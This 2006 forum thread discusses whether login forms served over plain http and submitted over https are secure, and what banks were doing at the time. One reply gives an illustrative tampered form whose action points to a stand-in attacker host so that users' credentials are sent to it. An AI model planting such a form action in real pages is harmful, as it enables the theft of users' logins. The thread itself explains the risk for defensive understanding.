log in then https?

Forum Moderators: phranque

Message Too Old, No Replies

log in then https?

Clinton Labombard

2:22 am on Mar 27, 2006 (gmt 0)

I've noticed some sites will allow you to enter your login information with an http page then after you've hit the submit button it switches to an https page. Is that secure?

(by the way, shouldn't there be a security related section here? )

Raymond

4:30 am on Mar 27, 2006 (gmt 0)

Nothing is encrypted in http, so if you enter your password in http, it can be seen as plain text.

MichaelBluejay

2:18 pm on Mar 27, 2006 (gmt 0)

There's more to this issue than you think. The bottom line is, your info is not secure, but not for the Raymond thinks. The HTML behind the login form will be something like <form action=http://www.domain.com/login.cgi">. If the action is htts://, the form is submitted securely. If the action is http:// (without the "s"), it's not.

But there's another problem: If the <form> resides on a page that is itself insecure (http:// instead of [),...] then a hacker listening in could have intercepted the page and hacked it before sending it to the user, replacing the form with something like <form action="http://www.evilhacker.com">. The problem is not the missing "s", the problem is that when you hit Submit, you'll be sending your info straight to a hacker.

Amazingly, most banks' login forms are on insecure pages. What's worse, if you click the little Security Info icon under the login form, you get a page with some B.S. about how the form is supposedly secure because the action url is [....] But in reality, the login is compromised if it's on a insecure page because it could have been hacked before the user ever sees it. The banks' method of security is like having a house with two doors and locking one of them (and then falsely telling everyone that the house is completely secure.)

Netcraft and Microsoft have been telling banks not to do this, but they're not listening.

More at Netcraft: [news.netcraft.com...]

Clinton Labombard

4:27 pm on Mar 27, 2006 (gmt 0)

I see. Thank you very much. I know of a few credit card companies that use the 'double-door' method.

ronburk

9:43 pm on Mar 27, 2006 (gmt 0)

Nothing is encrypted in http, so if you enter your password in http, it can be seen as plain text.

Perhaps too broad an inference to draw from just the word "http". JavaScript or other client-side code is free to encrypt and transmit over HTTP. Digest authentication is reasonably widely supported at this point.

But there's another problem: If the <form> resides on a page that is itself insecure (http:// instead of [),...] then a hacker listening in could have intercepted the page and hacked it before sending it to the user, replacing the form with something like <form action="http://www.evilhacker.com">. The problem is not the missing "s", the problem is that when you hit Submit, you'll be sending your info straight to a hacker.

Presumes the bad guy has control of the network either in the middle or on the server side. I would certainly not be wanting to trust my login information to even HTTPS at that point.

log in then https?

Clinton Labombard

Raymond

MichaelBluejay

Clinton Labombard

ronburk

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week